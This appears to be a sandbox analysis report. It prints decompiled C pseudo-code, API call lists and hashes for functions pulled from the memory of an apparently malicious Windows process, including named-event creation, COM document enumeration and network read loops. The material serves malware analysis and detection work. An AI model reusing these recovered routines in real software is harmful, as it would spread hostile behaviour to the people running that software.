                                                          • Instruction Fuzzy Hash: 8A014F321042C1ABE7306B61DC44F1BB7A4EF5476AF104A26F951A12E0F771E845AB65
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E04633E69(intOrPtr _a4) {
                                                          				void* _t2;
                                                          				unsigned int _t4;
                                                          				void* _t5;
                                                          				long _t6;
                                                          				void* _t7;
                                                          				void* _t15;
                                                          
                                                          				_t2 = CreateEventA(0, 1, 0, 0);
                                                          				 *0x463d26c = _t2;
                                                          				if(_t2 == 0) {
                                                          					return GetLastError();
                                                          				}
                                                          				_t4 = GetVersion();
                                                          				if(_t4 != 5) {
                                                          					L4:
                                                          					if(_t15 <= 0) {
                                                          						_t5 = 0x32;
                                                          						return _t5;
                                                          					}
                                                          					L5:
                                                          					 *0x463d25c = _t4;
                                                          					_t6 = GetCurrentProcessId();
                                                          					 *0x463d258 = _t6;
                                                          					 *0x463d264 = _a4;
                                                          					_t7 = OpenProcess(0x10047a, 0, _t6);
                                                          					 *0x463d254 = _t7;
                                                          					if(_t7 == 0) {
                                                          						 *0x463d254 =  *0x463d254 | 0xffffffff;
                                                          					}
                                                          					return 0;
                                                          				}
                                                          				if(_t4 >> 8 > 0) {
                                                          					goto L5;
                                                          				}
                                                          				_t15 = _t4 - _t4;
                                                          				goto L4;
                                                          			}










                                                          APIs
                                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,0463131F,?,?,00000001,?,?,?,04634EF2,?), ref: 04633E71
                                                          • GetVersion.KERNEL32(?,00000001,?,?,?,04634EF2,?), ref: 04633E80
                                                          • GetCurrentProcessId.KERNEL32(?,00000001,?,?,?,04634EF2,?), ref: 04633E9C
                                                          • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,00000001,?,?,?,04634EF2,?), ref: 04633EB9
                                                          • GetLastError.KERNEL32(?,00000001,?,?,?,04634EF2,?), ref: 04633ED8
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.273412911.0000000004631000.00000020.00000001.sdmp, Offset: 04630000, based on PE: true
                                                          • Associated: 00000009.00000002.273336452.0000000004630000.00000004.00000001.sdmp
                                                          • Associated: 00000009.00000002.273671396.000000000463C000.00000002.00000001.sdmp
                                                          • Associated: 00000009.00000002.273780141.000000000463D000.00000004.00000001.sdmp
                                                          • Associated: 00000009.00000002.273884572.000000000463F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: Process$CreateCurrentErrorEventLastOpenVersion
                                                          • String ID:
                                                          • API String ID: 2270775618-0
                                                          • Opcode ID: 797df01dc25679113245dbd7397e1957f861832ec1890ba3667d4db99c355a53
                                                          • Instruction ID: ded2f4ab5eae409c3c11abba352b891670b9b497c1890574cbef6f65020e73ba
                                                          • Opcode Fuzzy Hash: 797df01dc25679113245dbd7397e1957f861832ec1890ba3667d4db99c355a53
                                                          • Instruction Fuzzy Hash: 4BF08C716443C2AFE7208F34A909B197B62EB80703F001516FA02DA3D4F7B9E881CB14
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 46%
                                                          			E04636F3A(intOrPtr* __eax) {
                                                          				void* _v8;
                                                          				WCHAR* _v12;
                                                          				void* _v16;
                                                          				char _v20;
                                                          				void* _v24;
                                                          				intOrPtr _v28;
                                                          				void* _v32;
                                                          				intOrPtr _v40;
                                                          				short _v48;
                                                          				intOrPtr _v56;
                                                          				short _v64;
                                                          				intOrPtr* _t54;
                                                          				intOrPtr* _t56;
                                                          				intOrPtr _t57;
                                                          				intOrPtr* _t58;
                                                          				intOrPtr* _t60;
                                                          				void* _t61;
                                                          				intOrPtr* _t63;
                                                          				intOrPtr* _t65;
                                                          				short _t67;
                                                          				intOrPtr* _t68;
                                                          				intOrPtr* _t70;
                                                          				intOrPtr* _t72;
                                                          				intOrPtr* _t75;
                                                          				intOrPtr* _t77;
                                                          				intOrPtr _t79;
                                                          				intOrPtr* _t83;
                                                          				intOrPtr* _t87;
                                                          				intOrPtr _t103;
                                                          				intOrPtr _t109;
                                                          				void* _t118;
                                                          				void* _t122;
                                                          				void* _t123;
                                                          				intOrPtr _t130;
                                                          
                                                          				_t123 = _t122 - 0x3c;
                                                          				_push( &_v8);
                                                          				_push(__eax);
                                                          				_t118 =  *((intOrPtr*)( *__eax + 0x48))();
                                                          				if(_t118 >= 0) {
                                                          					_t54 = _v8;
                                                          					_t103 =  *0x463d2a8; // 0x88a5a8
                                                          					_t5 = _t103 + 0x463e038; // 0x3050f485
                                                          					_t118 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
                                                          					_t56 = _v8;
                                                          					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
                                                          					if(_t118 >= 0) {
                                                          						__imp__#2(0x463c290);
                                                          						_v28 = _t57;
                                                          						if(_t57 == 0) {
                                                          							_t118 = 0x8007000e;
                                                          						} else {
                                                          							_t60 = _v32;
                                                          							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
                                                          							_t87 = __imp__#6;
                                                          							_t118 = _t61;
                                                          							if(_t118 >= 0) {
                                                          								_t63 = _v24;
                                                          								_t118 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
                                                          								if(_t118 >= 0) {
                                                          									_t130 = _v20;
                                                          									if(_t130 != 0) {
                                                          										_t67 = 3;
                                                          										_v64 = _t67;
                                                          										_v48 = _t67;
                                                          										_v56 = 0;
                                                          										_v40 = 0;
                                                          										if(_t130 > 0) {
                                                          											while(1) {
                                                          												_t68 = _v24;
                                                          												asm("movsd");
                                                          												asm("movsd");
                                                          												asm("movsd");
                                                          												asm("movsd");
                                                          												_t123 = _t123;
                                                          												asm("movsd");
                                                          												asm("movsd");
                                                          												asm("movsd");
                                                          												asm("movsd");
                                                          												_t118 =  *((intOrPtr*)( *_t68 + 0x2c))(_t68,  &_v8);
                                                          												if(_t118 < 0) {
                                                          													goto L16;
                                                          												}
                                                          												_t70 = _v8;
                                                          												_t109 =  *0x463d2a8; // 0x88a5a8
                                                          												_t28 = _t109 + 0x463e0bc; // 0x3050f1ff
                                                          												_t118 =  *((intOrPtr*)( *_t70))(_t70, _t28,  &_v16);
                                                          												if(_t118 >= 0) {
                                                          													_t75 = _v16;
                                                          													_t118 =  *((intOrPtr*)( *_t75 + 0x34))(_t75,  &_v12);
                                                          													if(_t118 >= 0 && _v12 != 0) {
                                                          														_t79 =  *0x463d2a8; // 0x88a5a8
                                                          														_t33 = _t79 + 0x463e078; // 0x76006f
                                                          														if(lstrcmpW(_v12, _t33) == 0) {
                                                          															_t83 = _v16;
                                                          															 *((intOrPtr*)( *_t83 + 0x114))(_t83);
                                                          														}
                                                          														 *_t87(_v12);
                                                          													}
                                                          													_t77 = _v16;
                                                          													 *((intOrPtr*)( *_t77 + 8))(_t77);
                                                          												}
                                                          												_t72 = _v8;
                                                          												 *((intOrPtr*)( *_t72 + 8))(_t72);
                                                          												_v40 = _v40 + 1;
                                                          												if(_v40 < _v20) {
                                                          													continue;
                                                          												}
                                                          												goto L16;
                                                          											}
                                                          										}
                                                          									}
                                                          								}
                                                          								L16:
                                                          								_t65 = _v24;
                                                          								 *((intOrPtr*)( *_t65 + 8))(_t65);
                                                          							}
                                                          							 *_t87(_v28);
                                                          						}
                                                          						_t58 = _v32;
                                                          						 *((intOrPtr*)( *_t58 + 8))(_t58);
                                                          					}
                                                          				}
                                                          				return _t118;
                                                          			}






































                                                          APIs
                                                          • SysAllocString.OLEAUT32(0463C290), ref: 04636F8A
                                                          • lstrcmpW.KERNEL32(00000000,0076006F), ref: 0463706B
                                                          • SysFreeString.OLEAUT32(00000000), ref: 04637084
                                                          • SysFreeString.OLEAUT32(?), ref: 046370B3
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.273412911.0000000004631000.00000020.00000001.sdmp, Offset: 04630000, based on PE: true
                                                          • Associated: 00000009.00000002.273336452.0000000004630000.00000004.00000001.sdmp
                                                          • Associated: 00000009.00000002.273671396.000000000463C000.00000002.00000001.sdmp
                                                          • Associated: 00000009.00000002.273780141.000000000463D000.00000004.00000001.sdmp
                                                          • Associated: 00000009.00000002.273884572.000000000463F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: String$Free$Alloclstrcmp
                                                          • String ID:
                                                          • API String ID: 1885612795-0
                                                          • Opcode ID: 590aaa8eeaa470f24c705e241844c3f009e64ca33e2e56fff12bec0618d59986
                                                          • Instruction ID: 58990ec4fc928ebf6db7db7366918659f27f878ab711b49057e93e3030b335f8
                                                          • Opcode Fuzzy Hash: 590aaa8eeaa470f24c705e241844c3f009e64ca33e2e56fff12bec0618d59986
                                                          • Instruction Fuzzy Hash: 565100B5D00559EFCB10DFE8C488DAEB7B5EF89706B148598E915EB310E732AD41CBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • SysAllocString.OLEAUT32(?), ref: 0463395A
                                                          • SysFreeString.OLEAUT32(00000000), ref: 04633A3F
                                                            • Part of subcall function 04636F3A: SysAllocString.OLEAUT32(0463C290), ref: 04636F8A
                                                          • SafeArrayDestroy.OLEAUT32(00000000), ref: 04633A92
                                                          • SysFreeString.OLEAUT32(00000000), ref: 04633AA1
                                                            • Part of subcall function 04631AE2: Sleep.KERNEL32(000001F4), ref: 04631B2A
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.273412911.0000000004631000.00000020.00000001.sdmp, Offset: 04630000, based on PE: true
                                                          • Associated: 00000009.00000002.273336452.0000000004630000.00000004.00000001.sdmp
                                                          • Associated: 00000009.00000002.273671396.000000000463C000.00000002.00000001.sdmp
                                                          • Associated: 00000009.00000002.273780141.000000000463D000.00000004.00000001.sdmp
                                                          • Associated: 00000009.00000002.273884572.000000000463F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: String$AllocFree$ArrayDestroySafeSleep
                                                          • String ID:
                                                          • API String ID: 3193056040-0
                                                          • Opcode ID: 4297a8b1e3e371862ff13c479a18a2e7c7b394611dc466768c338dc1964bbef0
                                                          • Instruction ID: 708dc3d4b1844fb6cbc7b12bb188c90c621f1d7e73aa020d7e3cc378640866d9
                                                          • Opcode Fuzzy Hash: 4297a8b1e3e371862ff13c479a18a2e7c7b394611dc466768c338dc1964bbef0
                                                          • Instruction Fuzzy Hash: C9514E76500689AFDB11CFE8C844A9EB7B6FF88746F148429E905EB320EB35ED45CB50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 85%
                                                          			E046353C6(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
                                                          				intOrPtr _v8;
                                                          				intOrPtr _v12;
                                                          				signed int _v16;
                                                          				void _v92;
                                                          				void _v236;
                                                          				void* _t55;
                                                          				unsigned int _t56;
                                                          				signed int _t66;
                                                          				signed int _t74;
                                                          				void* _t76;
                                                          				signed int _t79;
                                                          				void* _t81;
                                                          				void* _t92;
                                                          				void* _t96;
                                                          				signed int* _t99;
                                                          				signed int _t101;
                                                          				signed int _t103;
                                                          				void* _t107;
                                                          
                                                          				_t92 = _a12;
                                                          				_t101 = __eax;
                                                          				_t55 = E04631AD1(_a16, _t92);
                                                          				_t79 = _t55;
                                                          				if(_t79 == 0) {
                                                          					L18:
                                                          					return _t55;
                                                          				}
                                                          				_t56 =  *(_t92 + _t79 * 4 - 4);
                                                          				_t81 = 0;
                                                          				_t96 = 0x20;
                                                          				if(_t56 == 0) {
                                                          					L4:
                                                          					_t97 = _t96 - _t81;
                                                          					_v12 = _t96 - _t81;
                                                          					E046350FF(_t79,  &_v236);
                                                          					 *((intOrPtr*)(_t107 + _t101 * 4 - 0xe8)) = E04635745(_t101,  &_v236, _a8, _t96 - _t81);
                                                          					E04635745(_t79,  &_v92, _a12, _t97);
                                                          					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x5c));
                                                          					_t66 = E046350FF(_t101, 0x463d1b0);
                                                          					_t103 = _t101 - _t79;
                                                          					_a8 = _t103;
                                                          					if(_t103 < 0) {
                                                          						L17:
                                                          						E046350FF(_a16, _a4);
                                                          						E04635088(_t79,  &_v236, _a4, _t97);
                                                          						memset( &_v236, 0, 0x8c);
                                                          						_t55 = memset( &_v92, 0, 0x44);
                                                          						goto L18;
                                                          					}
                                                          					_t99 = _t107 + (_t103 + _t79) * 4 - 0xe8;
                                                          					do {
                                                          						if(_v8 != 0xffffffff) {
                                                          							_push(1);
                                                          							_push(0);
                                                          							_push(0);
                                                          							_push( *_t99);
                                                          							L0463AF2E();
                                                          							_t74 = _t66 +  *(_t99 - 4);
                                                          							asm("adc edx, esi");
                                                          							_push(0);
                                                          							_push(_v8 + 1);
                                                          							_push(_t92);
                                                          							_push(_t74);
                                                          							L0463AF28();
                                                          							if(_t92 > 0 || _t74 > 0xffffffff) {
                                                          								_t74 = _t74 | 0xffffffff;
                                                          								_v16 = _v16 & 0x00000000;
                                                          							}
                                                          						} else {
                                                          							_t74 =  *_t99;
                                                          						}
                                                          						_t106 = _t107 + _a8 * 4 - 0xe8;
                                                          						_a12 = _t74;
                                                          						_t76 = E04635F21(_t79,  &_v92, _t92, _t107 + _a8 * 4 - 0xe8, _t107 + _a8 * 4 - 0xe8, _t74);
                                                          						while(1) {
                                                          							 *_t99 =  *_t99 - _t76;
                                                          							if( *_t99 != 0) {
                                                          								goto L14;
                                                          							}
                                                          							L13:
                                                          							_t92 =  &_v92;
                                                          							if(E046390C2(_t79, _t92, _t106) < 0) {
                                                          								break;
                                                          							}
                                                          							L14:
                                                          							_a12 = _a12 + 1;
                                                          							_t76 = E04636044(_t79,  &_v92, _t106, _t106);
                                                          							 *_t99 =  *_t99 - _t76;
                                                          							if( *_t99 != 0) {
                                                          								goto L14;
                                                          							}
                                                          							goto L13;
                                                          						}
                                                          						_a8 = _a8 - 1;
                                                          						_t66 = _a12;
                                                          						_t99 = _t99 - 4;
                                                          						 *(0x463d1b0 + _a8 * 4) = _t66;
                                                          					} while (_a8 >= 0);
                                                          					_t97 = _v12;
                                                          					goto L17;
                                                          				}
                                                          				while(_t81 < _t96) {
                                                          					_t81 = _t81 + 1;
                                                          					_t56 = _t56 >> 1;
                                                          					if(_t56 != 0) {
                                                          						continue;
                                                          					}
                                                          					goto L4;
                                                          				}
                                                          				goto L4;
                                                          			}

                                                          APIs
                                                          • _allmul.NTDLL(?,00000000,00000000,00000001), ref: 04635473
                                                          • _aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 04635489
                                                          • memset.NTDLL ref: 04635529
                                                          • memset.NTDLL ref: 04635539
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.273412911.0000000004631000.00000020.00000001.sdmp, Offset: 04630000, based on PE: true
                                                          • Associated: 00000009.00000002.273336452.0000000004630000.00000004.00000001.sdmp
                                                          • Associated: 00000009.00000002.273671396.000000000463C000.00000002.00000001.sdmp
                                                          • Associated: 00000009.00000002.273780141.000000000463D000.00000004.00000001.sdmp
                                                          • Associated: 00000009.00000002.273884572.000000000463F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: memset$_allmul_aulldiv
                                                          • String ID:
                                                          • API String ID: 3041852380-0
                                                          • Opcode ID: c7bd12976faab34d39488f89918d215e899863cc72ee007c8d6752664afc9289
                                                          • Instruction ID: 1f77c7215bb237bda266249a67f996f84fa6e4e664476a7463449ce61bb434d7
                                                          • Opcode Fuzzy Hash: c7bd12976faab34d39488f89918d215e899863cc72ee007c8d6752664afc9289
                                                          • Instruction Fuzzy Hash: EC418271A00299BBEB149FA8CC40BDE7775EF44316F108529F91BA7280FB70BD558B94
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • lstrlen.KERNEL32(?,00000008,74B04D40), ref: 0463A82E
                                                            • Part of subcall function 0463A71F: RtlAllocateHeap.NTDLL(00000000,00000000,04635595), ref: 0463A72B
                                                          • ResetEvent.KERNEL32(?), ref: 0463A8A2
                                                          • GetLastError.KERNEL32 ref: 0463A8C5
                                                          • GetLastError.KERNEL32 ref: 0463A970
                                                            • Part of subcall function 0463A734: HeapFree.KERNEL32(00000000,00000000,04635637,00000000,?,?,00000000), ref: 0463A740
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.273412911.0000000004631000.00000020.00000001.sdmp, Offset: 04630000, based on PE: true
                                                          • Associated: 00000009.00000002.273336452.0000000004630000.00000004.00000001.sdmp
                                                          • Associated: 00000009.00000002.273671396.000000000463C000.00000002.00000001.sdmp
                                                          • Associated: 00000009.00000002.273780141.000000000463D000.00000004.00000001.sdmp
                                                          • Associated: 00000009.00000002.273884572.000000000463F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: ErrorHeapLast$AllocateEventFreeResetlstrlen
                                                          • String ID:
                                                          • API String ID: 943265810-0
                                                          • Opcode ID: 8cd09a093aebb4d71e17043477985e50c4e876dde8096352dc24f77482af8f5f
                                                          • Instruction ID: 4988cfe0586e61eeb28c7e6fe0615ce777bc050b6efd9583b928845b6005b3ce
                                                          • Opcode Fuzzy Hash: 8cd09a093aebb4d71e17043477985e50c4e876dde8096352dc24f77482af8f5f
                                                          • Instruction Fuzzy Hash: 27418E71500284BFD7219FE1CC88E5B7BBDEB9570AF114929F582E2190F732E945EB20
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 42%
                                                          			E046315FF(void* __eax, void* __ecx) {
                                                          				char _v8;
                                                          				void* _v12;
                                                          				intOrPtr _v16;
                                                          				char _v20;
                                                          				void* __esi;
                                                          				void* _t30;
                                                          				intOrPtr _t38;
                                                          				intOrPtr* _t39;
                                                          				intOrPtr* _t41;
                                                          				void* _t54;
                                                          				long _t64;
                                                          				void* _t67;
                                                          				void* _t69;
                                                          
                                                          				_t58 = __ecx;
                                                          				_t67 = __eax;
                                                          				if( *((intOrPtr*)(__eax + 0xc)) != 0) {
                                                          					L2:
                                                          					_t30 = _t67;
                                                          					_pop(_t68);
                                                          					_t69 = _t30;
                                                          					_t64 = 0;
                                                          					ResetEvent( *(_t69 + 0x1c));
                                                          					_push( &_v8);
                                                          					_push(4);
                                                          					_push( &_v20);
                                                          					_push( *((intOrPtr*)(_t69 + 0x18)));
                                                          					if( *0x463d134() != 0) {
                                                          						L9:
                                                          						if(_v8 == 0) {
                                                          							 *((intOrPtr*)(_t69 + 0x30)) = 0;
                                                          						} else {
                                                          							 *0x463d164(0, 1,  &_v12);
                                                          							if(0 != 0) {
                                                          								_t64 = 8;
                                                          							} else {
                                                          								_t38 = E0463A71F(0x1000);
                                                          								_v16 = _t38;
                                                          								if(_t38 == 0) {
                                                          									_t64 = 8;
                                                          								} else {
                                                          									_push(0);
                                                          									_push(_v8);
                                                          									_push( &_v20);
                                                          									while(1) {
                                                          										_t41 = _v12;
                                                          										_t61 =  *_t41;
                                                          										 *((intOrPtr*)( *_t41 + 0x10))(_t41);
                                                          										ResetEvent( *(_t69 + 0x1c));
                                                          										_push( &_v8);
                                                          										_push(0x1000);
                                                          										_push(_v16);
                                                          										_push( *((intOrPtr*)(_t69 + 0x18)));
                                                          										if( *0x463d134() != 0) {
                                                          											goto L17;
                                                          										}
                                                          										_t64 = GetLastError();
                                                          										if(_t64 == 0x3e5) {
                                                          											_t64 = E04635646( *(_t69 + 0x1c), _t61, 0xffffffff);
                                                          											if(_t64 == 0) {
                                                          												_t64 =  *((intOrPtr*)(_t69 + 0x28));
                                                          												if(_t64 == 0) {
                                                          													goto L17;
                                                          												}
                                                          											}
                                                          										}
                                                          										L19:
                                                          										E0463A734(_v16);
                                                          										if(_t64 == 0) {
                                                          											_t64 = E046370CC(_v12, _t69);
                                                          										}
                                                          										goto L22;
                                                          										L17:
                                                          										_t64 = 0;
                                                          										if(_v8 != 0) {
                                                          											_push(0);
                                                          											_push(_v8);
                                                          											_push(_v16);
                                                          											continue;
                                                          										}
                                                          										goto L19;
                                                          									}
                                                          								}
                                                          								L22:
                                                          								_t39 = _v12;
                                                          								 *((intOrPtr*)( *_t39 + 8))(_t39);
                                                          							}
                                                          						}
                                                          					} else {
                                                          						_t64 = GetLastError();
                                                          						if(_t64 != 0x3e5) {
                                                          							L8:
                                                          							if(_t64 == 0) {
                                                          								goto L9;
                                                          							}
                                                          						} else {
                                                          							_t64 = E04635646( *(_t69 + 0x1c), _t58, 0xffffffff);
                                                          							if(_t64 == 0) {
                                                          								_t64 =  *((intOrPtr*)(_t69 + 0x28));
                                                          								goto L8;
                                                          							}
                                                          						}
                                                          					}
                                                          					return _t64;
                                                          				} else {
                                                          					_t54 = E04639242(__ecx, __eax);
                                                          					if(_t54 != 0) {
                                                          						return _t54;
                                                          					} else {
                                                          						goto L2;
                                                          					}
                                                          				}
                                                          			}

















                                                          APIs
                                                          • ResetEvent.KERNEL32(?,00000000,?,00000102,?,?,00000000,00000000,74B481D0), ref: 046318EE
                                                          • GetLastError.KERNEL32(?,?,?,00000000,74B481D0), ref: 04631907
                                                          • ResetEvent.KERNEL32(?), ref: 04631980
                                                          • GetLastError.KERNEL32 ref: 0463199B
                                                            • Part of subcall function 04639242: WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,00000000,00000000,74B481D0), ref: 04639259
                                                            • Part of subcall function 04639242: SetEvent.KERNEL32(?), ref: 04639269
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.273412911.0000000004631000.00000020.00000001.sdmp, Offset: 04630000, based on PE: true
                                                          • Associated: 00000009.00000002.273336452.0000000004630000.00000004.00000001.sdmp
                                                          • Associated: 00000009.00000002.273671396.000000000463C000.00000002.00000001.sdmp
                                                          • Associated: 00000009.00000002.273780141.000000000463D000.00000004.00000001.sdmp
                                                          • Associated: 00000009.00000002.273884572.000000000463F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: Event$ErrorLastReset$ObjectSingleWait
                                                          • String ID:
                                                          • API String ID: 1123145548-0
                                                          • Opcode ID: 27403b2cd4eb2aec9a547f5051ca7b6c5dd8f06f3ae6f191dc9559e52dc6f2ab
                                                          • Instruction ID: e18d004ae149eeb32ec5809308d6035962161339d30d2837e8b6c0f64ba348fe
                                                          • Opcode Fuzzy Hash: 27403b2cd4eb2aec9a547f5051ca7b6c5dd8f06f3ae6f191dc9559e52dc6f2ab
                                                          • Instruction Fuzzy Hash: 5241A032600684ABDB219FA5CC44AEEB7B9EF8936BF100529E552D7290FB30FD419B50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • SysAllocString.OLEAUT32(80000002), ref: 04633B0D
                                                          • SysAllocString.OLEAUT32(046385ED), ref: 04633B51
                                                          • SysFreeString.OLEAUT32(00000000), ref: 04633B65
                                                          • SysFreeString.OLEAUT32(00000000), ref: 04633B73
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.273412911.0000000004631000.00000020.00000001.sdmp, Offset: 04630000, based on PE: true
                                                          • Associated: 00000009.00000002.273336452.0000000004630000.00000004.00000001.sdmp
                                                          • Associated: 00000009.00000002.273671396.000000000463C000.00000002.00000001.sdmp
                                                          • Associated: 00000009.00000002.273780141.000000000463D000.00000004.00000001.sdmp
                                                          • Associated: 00000009.00000002.273884572.000000000463F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: String$AllocFree
                                                          • String ID:
                                                          • API String ID: 344208780-0
                                                          • Opcode ID: 8c17912eb00aef32b8d02ef206d436e8c024b1fcdb4ce903fd7d2d55f8b9aa31
                                                          • Instruction ID: 047e8dd7af94f4bd351c246fe6611f83ea459d4ac47194e82364de6b2587d2b2
                                                          • Opcode Fuzzy Hash: 8c17912eb00aef32b8d02ef206d436e8c024b1fcdb4ce903fd7d2d55f8b9aa31
                                                          • Instruction Fuzzy Hash: 81311272900289EFCB04DF98D8C49AE7BB9FF58301B10845EF90697351E735A981CF65
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 87%
                                                          			E046311EE(signed int _a4, signed int* _a8) {
                                                          				void* __ecx;
                                                          				void* __edi;
                                                          				signed int _t6;
                                                          				intOrPtr _t8;
                                                          				intOrPtr _t12;
                                                          				short* _t19;
                                                          				void* _t25;
                                                          				signed int* _t28;
                                                          				CHAR* _t30;
                                                          				long _t31;
                                                          				intOrPtr* _t32;
                                                          
                                                          				_t6 =  *0x463d270; // 0xd448b889
                                                          				_t32 = _a4;
                                                          				_a4 = _t6 ^ 0x109a6410;
                                                          				_t8 =  *0x463d2a8; // 0x88a5a8
                                                          				_t3 = _t8 + 0x463e87e; // 0x61636f4c
                                                          				_t25 = 0;
                                                          				_t30 = E046338A8(_t3, 1);
                                                          				if(_t30 != 0) {
                                                          					_t25 = CreateEventA(0x463d2ac, 1, 0, _t30);
                                                          					E0463A734(_t30);
                                                          				}
                                                          				_t12 =  *0x463d25c; // 0x4000000a
                                                          				if(_t12 <= 5 || _t12 == 6 && _t12 >= 2 ||  *_t32 == 0 || E0463A65C() != 0) {
                                                          					L12:
                                                          					_t28 = _a8;
                                                          					if(_t28 != 0) {
                                                          						 *_t28 =  *_t28 | 0x00000001;
                                                          					}
                                                          					_t31 = E04638EA1(_t32, 0);
                                                          					if(_t31 == 0 && _t25 != 0) {
                                                          						_t31 = WaitForSingleObject(_t25, 0x4e20);
                                                          					}
                                                          					if(_t28 != 0 && _t31 != 0) {
                                                          						 *_t28 =  *_t28 & 0xfffffffe;
                                                          					}
                                                          					goto L20;
                                                          				} else {
                                                          					_t19 =  *0x463d10c( *_t32, 0x20);
                                                          					if(_t19 != 0) {
                                                          						 *_t19 = 0;
                                                          						_t19 = _t19 + 2;
                                                          					}
                                                          					_t31 = E0463A273(0,  *_t32, _t19, 0);
                                                          					if(_t31 == 0) {
                                                          						if(_t25 == 0) {
                                                          							L22:
                                                          							return _t31;
                                                          						}
                                                          						_t31 = WaitForSingleObject(_t25, 0x4e20);
                                                          						if(_t31 == 0) {
                                                          							L20:
                                                          							if(_t25 != 0) {
                                                          								CloseHandle(_t25);
                                                          							}
                                                          							goto L22;
                                                          						}
                                                          					}
                                                          					goto L12;
                                                          				}
                                                          			}















                                                          APIs
                                                            • Part of subcall function 046338A8: lstrlen.KERNEL32(00000005,00000000,63699BC3,00000027,00000000,04EC9A98,00000000,?,?,63699BC3,00000005,0463D00C,?,?,04635D30), ref: 046338DE
                                                            • Part of subcall function 046338A8: lstrcpy.KERNEL32(00000000,00000000), ref: 04633902
                                                            • Part of subcall function 046338A8: lstrcat.KERNEL32(00000000,00000000), ref: 0463390A
                                                          • CreateEventA.KERNEL32(0463D2AC,00000001,00000000,00000000,61636F4C,00000001,00000000,00000001,?,00000000,?,04633760,?,00000001,?), ref: 0463122F
                                                            • Part of subcall function 0463A734: HeapFree.KERNEL32(00000000,00000000,04635637,00000000,?,?,00000000), ref: 0463A740
                                                          • WaitForSingleObject.KERNEL32(00000000,00004E20,04633760,00000000,00000000,?,00000000,?,04633760,?,00000001,?,?,?,?,046352AA), ref: 0463128F
                                                          • WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,00000001,?,00000000,?,04633760,?,00000001,?), ref: 046312BD
                                                          • CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,00000001,?,00000000,?,04633760,?,00000001,?,?,?,?,046352AA), ref: 046312D5
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.273412911.0000000004631000.00000020.00000001.sdmp, Offset: 04630000, based on PE: true
                                                          • Associated: 00000009.00000002.273336452.0000000004630000.00000004.00000001.sdmp
                                                          • Associated: 00000009.00000002.273671396.000000000463C000.00000002.00000001.sdmp
                                                          • Associated: 00000009.00000002.273780141.000000000463D000.00000004.00000001.sdmp
                                                          • Associated: 00000009.00000002.273884572.000000000463F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
                                                          • String ID:
                                                          • API String ID: 73268831-0
                                                          • Opcode ID: 0904778d2a7e9b7b29458cda2a22fb13eb776b0089dd1e2a38acbe15e34498ce
                                                          • Instruction ID: 1054c62e7dd5baba2521e5ebad6de8b867c1f9b67fd1b4daf41b7f4f2d8f848c
                                                          • Opcode Fuzzy Hash: 0904778d2a7e9b7b29458cda2a22fb13eb776b0089dd1e2a38acbe15e34498ce
                                                          • Instruction Fuzzy Hash: EF21E432A003D05BD721DAA88C44EEB73A9FFAA713F050619FA55E7240FB75EC818694
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 38%
                                                          			E04639242(void* __ecx, void* __esi) {
                                                          				char _v8;
                                                          				long _v12;
                                                          				char _v16;
                                                          				long _v20;
                                                          				long _t34;
                                                          				long _t39;
                                                          				long _t42;
                                                          				long _t56;
                                                          				intOrPtr _t58;
                                                          				void* _t59;
                                                          				intOrPtr* _t60;
                                                          				void* _t61;
                                                          
                                                          				_t61 = __esi;
                                                          				_t59 = __ecx;
                                                          				_t60 =  *0x463d13c; // 0x463abf1
                                                          				 *((intOrPtr*)(__esi + 0x2c)) = 0;
                                                          				do {
                                                          					_t34 = WaitForSingleObject( *(_t61 + 0x1c), 0);
                                                          					_v20 = _t34;
                                                          					if(_t34 != 0) {
                                                          						L3:
                                                          						_push( &_v16);
                                                          						_push( &_v8);
                                                          						_push(_t61 + 0x2c);
                                                          						_push(0x20000013);
                                                          						_push( *((intOrPtr*)(_t61 + 0x18)));
                                                          						_v8 = 4;
                                                          						_v16 = 0;
                                                          						if( *_t60() == 0) {
                                                          							_t39 = GetLastError();
                                                          							_v12 = _t39;
                                                          							if(_v20 == 0 || _t39 != 0x2ef3) {
                                                          								L15:
                                                          								return _v12;
                                                          							} else {
                                                          								goto L11;
                                                          							}
                                                          						}
